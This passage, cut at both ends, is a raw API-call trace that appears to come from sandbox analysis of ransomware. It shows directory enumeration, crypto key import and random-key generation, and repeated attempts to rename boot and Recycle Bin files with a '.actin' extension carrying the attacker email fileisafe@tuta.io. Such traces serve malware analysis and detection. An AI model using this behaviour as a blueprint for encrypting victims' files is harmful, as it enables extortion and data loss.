dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.406] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d09d5ec, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d09d5ec, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d0c37ff, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 Thread: id = 117 os_tid = 0xfdc [0140.080] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30d0078 [0140.080] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30e0080 [0140.081] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a91f8 [0140.081] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x110102) returned 0x3675020 [0140.083] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x50) returned 0x26a9ce0 [0140.083] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af948, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af9b0 | out: phKey=0x32af9b0*=0xaa93d0) returned 1 [0140.083] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x32af998, dwFlags=0x0) returned 1 [0140.083] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9ce0, pdwDataLen=0x32af964 | out: pbData=0x26a9ce0, pdwDataLen=0x32af964) returned 1 [0140.083] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0140.084] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0140.084] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0140.084] Wow64DisableWow64FsRedirection (in: OldValue=0x32afa00 | out: OldValue=0x32afa00*=0x0) returned 1 [0140.084] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9ce0 | out: hHeap=0x26a0000) returned 1 [0140.084] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.084] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0140.084] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=129) returned 1 [0140.084] CloseHandle (hObject=0x2cc) returned 1 [0140.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0140.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0x20 [0140.085] ResetEvent (hEvent=0x29c) returned 1 [0140.085] SetEvent (hEvent=0x2a0) returned 1 [0140.085] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.085] CreateFileW (lpFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0140.085] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=0) returned 1 [0140.085] CloseHandle (hObject=0x2cc) returned 1 [0140.085] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.626] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.626] ResetEvent (hEvent=0x29c) returned 1 [0140.626] SetEvent (hEvent=0x2a0) returned 1 [0140.627] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.627] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.627] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.628] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.628] ResetEvent (hEvent=0x29c) returned 1 [0140.628] SetEvent (hEvent=0x2a0) returned 1 [0140.628] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.628] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0140.628] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=0) returned 1 [0140.629] CloseHandle (hObject=0x2d4) returned 1 [0140.629] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.630] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.630] ResetEvent (hEvent=0x29c) returned 1 [0140.630] SetEvent (hEvent=0x2a0) returned 1 [0140.631] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.631] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0140.632] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=95648) returned 1 [0140.632] CloseHandle (hObject=0x2d4) returned 1 [0140.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0140.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bootspaces.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.632] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.632] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.633] ResetEvent (hEvent=0x29c) returned 1 [0140.633] SetEvent (hEvent=0x2a0) returned 1 [0140.633] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.633] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0140.633] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=99744) returned 1 [0140.633] CloseHandle (hObject=0x2d4) returned 1 [0140.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0140.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bootvhd.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.633] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.633] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.635] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.635] ResetEvent (hEvent=0x29c) returned 1 [0140.635] SetEvent (hEvent=0x2a0) returned 1 [0140.635] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.635] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.635] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45472) returned 1 [0140.635] CloseHandle (hObject=0x2e0) returned 1 [0140.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui")) returned 0x20 [0140.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.636] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.636] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.637] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.637] ResetEvent (hEvent=0x29c) returned 1 [0140.637] SetEvent (hEvent=0x2a0) returned 1 [0140.637] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.637] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.638] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45472) returned 1 [0140.638] CloseHandle (hObject=0x2e0) returned 1 [0140.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui")) returned 0x20 [0140.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.638] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.638] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.639] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.640] ResetEvent (hEvent=0x29c) returned 1 [0140.640] SetEvent (hEvent=0x2a0) returned 1 [0140.640] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.640] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.640] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45984) returned 1 [0140.640] CloseHandle (hObject=0x2e0) returned 1 [0140.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui")) returned 0x20 [0140.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.640] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.640] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.642] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.642] ResetEvent (hEvent=0x29c) returned 1 [0140.642] SetEvent (hEvent=0x2a0) returned 1 [0140.642] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.642] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.643] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=46496) returned 1 [0140.643] CloseHandle (hObject=0x2e0) returned 1 [0140.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui")) returned 0x20 [0140.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.643] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.643] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.646] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.646] ResetEvent (hEvent=0x29c) returned 1 [0140.646] SetEvent (hEvent=0x2a0) returned 1 [0140.647] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.647] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.647] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=74144) returned 1 [0140.647] CloseHandle (hObject=0x2e0) returned 1 [0140.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0140.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.647] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.647] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.648] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.649] ResetEvent (hEvent=0x29c) returned 1 [0140.649] SetEvent (hEvent=0x2a0) returned 1 [0140.649] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.649] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.649] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77664) returned 1 [0140.649] CloseHandle (hObject=0x2e0) returned 1 [0140.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0140.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.649] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.649] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.651] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.651] ResetEvent (hEvent=0x29c) returned 1 [0140.651] SetEvent (hEvent=0x2a0) returned 1 [0140.651] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.651] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.651] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77664) returned 1 [0140.651] CloseHandle (hObject=0x2e0) returned 1 [0140.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui")) returned 0x20 [0140.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.652] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.652] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.653] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.653] ResetEvent (hEvent=0x29c) returned 1 [0140.653] SetEvent (hEvent=0x2a0) returned 1 [0140.653] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.654] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.654] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=76640) returned 1 [0140.654] CloseHandle (hObject=0x2e0) returned 1 [0140.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0140.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.654] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.654] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.655] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.656] ResetEvent (hEvent=0x29c) returned 1 [0140.656] SetEvent (hEvent=0x2a0) returned 1 [0140.656] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.656] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.657] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3695719) returned 1 [0140.657] CloseHandle (hObject=0x2e0) returned 1 [0140.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0140.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0140.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0 [0140.658] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.658] ResetEvent (hEvent=0x29c) returned 1 [0140.658] SetEvent (hEvent=0x2a0) returned 1 [0140.658] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.658] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.660] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3878410) returned 1 [0140.660] CloseHandle (hObject=0x2e0) returned 1 [0140.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0140.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0140.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0 [0140.660] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.660] ResetEvent (hEvent=0x29c) returned 1 [0140.660] SetEvent (hEvent=0x2a0) returned 1 [0140.661] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.661] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.663] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1985867) returned 1 [0140.663] CloseHandle (hObject=0x2e0) returned 1 [0140.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0140.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: 